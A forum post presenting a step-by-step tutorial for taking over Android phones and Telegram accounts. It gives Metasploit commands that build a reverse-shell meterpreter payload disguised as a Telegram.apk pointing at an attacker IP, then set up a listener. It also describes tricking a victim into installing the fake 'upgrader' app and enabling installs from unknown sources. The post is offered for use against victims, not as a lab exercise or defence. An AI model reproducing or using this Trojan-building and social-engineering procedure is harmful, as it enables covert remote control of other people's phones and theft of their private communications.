Sign in to follow this  
mesvak

?How to Hack Telegram Using Kali (Remotely)?

Recommended Posts

[hide]

 

 

 

This is a tutorial explaining how to hack android phones &

Telegram with Kali.

(Still ,you may already know about this)

 

 

Step 1:

 

Open a terminal, and make a Trojan .apk

You can do this by typing :

 

'msfpayload android/meterpreter/reversetcp

LHOST=95.108.142.138 R > /root/Desktop/Telegram.apk' 

(replace LHOST with your own IP)

 

You can also hack android on WAN i.e. through Interet by

using your Public/External IP in the LHOST and by port

forwarding (ask me about port forwarding if you have

problems in the comment section)

 

Step 2: Open Another Terminal:

 

Open another terminal until the file is being produced.

Load metasploit console, by typing : 'msfconsole'

 

Step 3: Set-Up a Listener:

 

After it loads(it will take time), load the multi-handler

exploit by typing : 

 

'use exploit/multi/handler'

 

Set up a (reverse) payload by typing : 

 

'set payload android/

meterpreter/reversetcp'

 

To set L host type :

 

 'set LHOST 192.168.0.4'

 

 (Even if you are hacking on WAN type your private/internal IP here not the public/external)

 

Step 4: Exploit!

 

At last type: exploit to start the listener.

 

Copy the application that you made (Telegram.apk) from

the root folder, to you android phone.

send file ....

 

Let the Victim install the Upgrader app(as he would think

it is meant to upgrade some features on his phone)

 

However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from

the security settings of the android phone to allow the

Trojan to install.

And when he clicks Open...

 

Step 5: BOOM!

There comes the meterpreter prompt

 

 

[/hide]

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this